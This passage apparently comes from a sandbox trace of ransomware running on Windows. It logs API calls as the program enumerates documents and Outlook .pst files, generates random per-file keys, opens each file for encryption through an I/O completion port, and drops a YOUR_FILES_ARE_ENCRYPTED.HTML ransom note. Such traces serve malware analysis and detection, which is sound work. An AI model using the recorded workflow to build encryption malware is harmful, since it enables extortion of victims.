MF8xoszJZMG1k_q.docx") returned=".docx" [0167.174] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx" (normalized: "c:\\users\\5alr3u30d3\\documents\\otlv mf8xoszjzmg1k_q.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.175] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=85243) returned 1 [0167.175] GetProcessHeap () returned 0x270000 [0167.175] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.176] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="9F") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="22") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="2F") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="B3") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="EE") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="D1") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="49") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="58") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="C3") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="DD") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="C9") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="C3") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="29") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="8A") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="30") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="DA") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="85") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="E7") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="0C") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="9F") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="6F") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="68") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="D4") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="F5") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="17") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="B2") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="8C") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="2A") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="D0") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="C0") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="99") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="67") returned 2 [0167.178] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx" [0167.178] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.178] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.195] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c57820, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x69b38e50, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b38e50, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0167.195] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files") returned 47 [0167.195] GetProcessHeap () returned 0x270000 [0167.195] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.195] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files" [0167.195] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\*" [0167.195] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c57820, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x69b38e50, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b38e50, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x125c8d5, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.196] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c57820, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x69b38e50, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b38e50, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x125c8d5, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.196] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28ca3ae0, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x28ca3ae0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x82a61770, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x125c8d5, dwReserved1=0x0, cFileName="norman@gdllo.de.pst", cAlternateFileName="NORMAN~1.PST")) returned 1 [0167.196] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst") returned 67 [0167.196] lstrcmpW (lpString1="norman@gdllo.de.pst", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.196] PathFindExtensionW (pszPath="norman@gdllo.de.pst") returned=".pst" [0167.196] lstrlenW (lpString=".pst") returned 4 [0167.196] PathFindExtensionW (pszPath="norman@gdllo.de.pst") returned=".pst" [0167.196] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst" (normalized: "c:\\users\\5alr3u30d3\\documents\\outlook files\\norman@gdllo.de.pst"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.197] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=271360) returned 1 [0167.197] GetProcessHeap () returned 0x270000 [0167.197] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.198] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="47") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="67") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="94") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B1") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="DD") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="A4") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="BC") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="87") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0F") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="96") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="98") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="92") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="12") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="2B") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="80") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="7A") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B7") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="FC") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="BA") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="3B") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="00") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="3A") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="B2") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="25") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="AE") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="36") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A3") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="98") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="EB") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B1") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E7") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="39") returned 2 [0167.200] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst" [0167.200] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.200] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.201] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28ca3ae0, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x28ca3ae0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x82a61770, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x125c8d5, dwReserved1=0x0, cFileName="norman@gdllo.de.pst", cAlternateFileName="NORMAN~1.PST")) returned 0 [0167.201] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.201] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0167.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\outlook files\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.217] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.219] CloseHandle (hObject=0x5ac) returned 1 [0167.219] GetProcessHeap () returned 0x270000 [0167.221] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.221] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c329420, ftCreationTime.dwHighDateTime=0x1d7df57, ftLastAccessTime.dwLowDateTime=0x9ca39d70, ftLastAccessTime.dwHighDateTime=0x1d7e5a2, ftLastWriteTime.dwLowDateTime=0x9ca39d70, ftLastWriteTime.dwHighDateTime=0x1d7e5a2, nFileSizeHigh=0x0, nFileSizeLow=0x133a3, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="rW24XMo g3EfMKuXFXbo.docx", cAlternateFileName="RW24XM~1.DOC")) returned 1 [0167.221] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx") returned 59 [0167.221] lstrcmpW (lpString1="rW24XMo g3EfMKuXFXbo.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.221] PathFindExtensionW (pszPath="rW24XMo g3EfMKuXFXbo.docx") returned=".docx" [0167.221] lstrlenW (lpString=".docx") returned 5 [0167.221] PathFindExtensionW (pszPath="rW24XMo g3EfMKuXFXbo.docx") returned=".docx" [0167.221] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx" (normalized: "c:\\users\\5alr3u30d3\\documents\\rw24xmo g3efmkuxfxbo.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.222] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=78755) returned 1 [0167.222] GetProcessHeap () returned 0x270000 [0167.222] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.223] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="37") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="AA") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="A6") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="4B") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="8C") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="FF") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="5D") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="74") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="5F") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="A1") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="91") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="F9") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="5E") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="03") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="37") returned 2 [0167.223] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="66") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="E0") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="5F") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="F0") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="CA") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="A9") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="A6") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="A0") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="52") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="82") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="57") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="00") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="72") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="EC") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="6F") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="25") returned 2 [0167.224] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="69") returned 2 [0167.225] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\rW24XMo g3EfMKuXFXbo.docx" [0167.225] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.225] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.227] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe5d2d10, ftCreationTime.dwHighDateTime=0x1d7e46b, ftLastAccessTime.dwLowDateTime=0x7b21cc50, ftLastAccessTime.dwHighDateTime=0x1d7e53c, ftLastWriteTime.dwLowDateTime=0x7b21cc50, ftLastWriteTime.dwHighDateTime=0x1d7e53c, nFileSizeHigh=0x0, nFileSizeLow=0x12145, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="skHn.docx", cAlternateFileName="SKHN~1.DOC")) returned 1 [0167.227] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\skHn.docx") returned 43 [0167.227] lstrcmpW (lpString1="skHn.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.227] PathFindExtensionW (pszPath="skHn.docx") returned=".docx" [0167.232] lstrlenW (lpString=".docx") returned 5 [0167.232] PathFindExtensionW (pszPath="skHn.docx") returned=".docx" [0167.232] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\skHn.docx" (normalized: "c:\\users\\5alr3u30d3\\documents\\skhn.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.237] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=74053) returned 1 [0167.237] GetProcessHeap () returned 0x270000 [0167.237] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.238] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="25") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="E2") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="1F") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="87") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="1A") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="7C") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="1D") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="5F") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="87") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="78") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="D8") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="8A") returned 2 [0167.238] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="3A") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="30") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="00") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="F5") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="FC") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="1E") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="03") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="49") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="0A") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="CD") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="C7") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="BE") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="E9") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="74") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="61") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="9C") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="11") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="01") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="4C") returned 2 [0167.239] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="44") returned 2 [0167.240] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\skHn.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\skHn.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\skHn.docx" [0167.240] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.240] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61f68170, ftCreationTime.dwHighDateTime=0x1d7b9f5, ftLastAccessTime.dwLowDateTime=0x4caa3610, ftLastAccessTime.dwHighDateTime=0x1d7bbbf, ftLastWriteTime.dwLowDateTime=0x4caa3610, ftLastWriteTime.dwHighDateTime=0x1d7bbbf, nFileSizeHigh=0x0, nFileSizeLow=0xda7, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="VO8vnxVyqWP zR.xlsx", cAlternateFileName="VO8VNX~1.XLS")) returned 1 [0167.250] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx") returned 53 [0167.250] lstrcmpW (lpString1="VO8vnxVyqWP zR.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.250] PathFindExtensionW (pszPath="VO8vnxVyqWP zR.xlsx") returned=".xlsx" [0167.250] lstrlenW (lpString=".xlsx") returned 5 [0167.250] PathFindExtensionW (pszPath="VO8vnxVyqWP zR.xlsx") returned=".xlsx" [0167.250] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\vo8vnxvyqwp zr.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 